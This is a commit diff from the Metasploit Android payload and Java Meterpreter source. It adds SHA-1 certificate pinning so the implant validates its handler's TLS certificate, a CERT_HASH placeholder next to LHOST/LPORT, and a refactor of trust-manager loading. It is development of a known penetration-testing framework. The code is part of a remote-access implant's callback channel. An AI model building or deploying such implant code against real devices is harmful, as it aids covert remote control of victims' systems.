add ssl cert validation

2024-12-21 05:35:54 +01:00 · 2015-05-20 07:27:39 +01:00 · 2015-05-20 07:27:39 +01:00 · 509e67b27a
commit 509e67b27a
parent d02a5e41e4
4 changed files with 52 additions and 4 deletions
--- a/java/androidpayload/app/src/com/metasploit/stage/Payload.java
+++ b/java/androidpayload/app/src/com/metasploit/stage/Payload.java
@ -19,6 +19,7 @@ import dalvik.system.DexClassLoader;
 public class Payload {

    public static final String URL =            "ZZZZ                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                ";
+    public static final String CERT_HASH =      "WWWW                                        ";
    public static final String LHOST =          "XXXX127.0.0.1                       ";
    public static final String LPORT =          "YYYY4444                            ";
    public static final String RETRY_TOTAL =    "TTTT                                ";
--- a/java/androidpayload/app/src/com/metasploit/stage/PayloadTrustManager.java
+++ b/java/androidpayload/app/src/com/metasploit/stage/PayloadTrustManager.java
@ -42,6 +42,10 @@ import javax.net.ssl.SSLSession;
 import javax.net.ssl.TrustManager;
 import javax.net.ssl.X509TrustManager;

+import java.security.MessageDigest;
+import java.security.NoSuchAlgorithmException;
+import java.security.cert.CertificateEncodingException;
+import java.security.cert.CertificateException;
 import java.security.cert.X509Certificate;

 /**
@ -57,14 +61,49 @@ public class PayloadTrustManager implements X509TrustManager, HostnameVerifier {
        return new X509Certificate[0];
    }

+    public static String getCertificateSHA1(X509Certificate cert)
+            throws NoSuchAlgorithmException, CertificateEncodingException {
+        MessageDigest md = MessageDigest.getInstance("SHA-1");
+        md.update(cert.getEncoded());
+        return bytesToHex(md.digest());
+    }
+
+    public static String bytesToHex(byte bytes[]) {
+        char[] hexDigits = {'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f'};
+        StringBuilder buf = new StringBuilder(bytes.length * 2);
+        for (byte aByte : bytes) {
+            buf.append(hexDigits[(aByte & 0xf0) >> 4]);
+            buf.append(hexDigits[aByte & 0x0f]);
+        }
+        return buf.toString();
+    }
+
    public void checkClientTrusted(java.security.cert.X509Certificate[] certs,
                                   String authType) {
        // trust everyone
    }

    public void checkServerTrusted(java.security.cert.X509Certificate[] certs,
-                                   String authType) {
-        // trust everyone
+                                   String authType) throws CertificateException {
+
+        String payloadHash = Payload.CERT_HASH.substring(4).trim();
+        if (payloadHash.length() == 0) {
+            // No HandlerSSLCert set on payload, trust everyone
+            return;
+        }
+        if (certs == null || certs.length < 1) {
+            throw new CertificateException();
+        }
+        for (X509Certificate certificate : certs) {
+            try {
+                String serverHash = getCertificateSHA1(certificate);
+                if (!serverHash.equals(payloadHash)) {
+                    throw new CertificateException("Invalid certificate");
+                }
+            } catch (Exception e) {
+                throw new CertificateException(e);
+            }
+        }
    }

    public boolean verify(String hostname, SSLSession session) {
--- a/java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
@ -67,7 +67,6 @@ public class AndroidMeterpreter extends Meterpreter {
            // Post to the UI/Main thread and try and retrieve the Context
            final Handler handler = new Handler(Looper.getMainLooper());
            handler.post(new Runnable() {
-                @Override
                public void run() {
                    try {
                        context = (Context) currentApplication.invoke(null, (Object[]) null);
@ -100,6 +99,11 @@ public class AndroidMeterpreter extends Meterpreter {
        startExecuting();
    }

+    @Override
+    protected String getPayloadTrustManager() {
+        return "com.metasploit.stage.PayloadTrustManager";
+    }
+
    @Override
    public String[] loadExtension(byte[] data) throws Exception {
        getCommandManager().resetNewCommands();
--- a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Meterpreter.java
+++ b/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Meterpreter.java
@ -106,6 +106,10 @@ public class Meterpreter {
        }
    }

+    protected String getPayloadTrustManager() {
+        return "com.metasploit.meterpreter.PayloadTrustManager";
+    }
+
    /**
     * Write a TLV packet to this meterpreter's output stream.
     *
@ -188,7 +192,7 @@ public class Meterpreter {
                    // load the trust manager via reflection, to avoid loading
                    // it when it is not needed (it requires Sun Java 1.4+)
                    try {
-                        Class.forName("com.metasploit.meterpreter.PayloadTrustManager").getMethod("useFor", new Class[]{URLConnection.class}).invoke(null, new Object[]{uc});
+                        Class.forName(getPayloadTrustManager()).getMethod("useFor", new Class[]{URLConnection.class}).invoke(null, new Object[]{uc});
                    } catch (Exception ex) {
                        ex.printStackTrace(getErrorStream());
                    }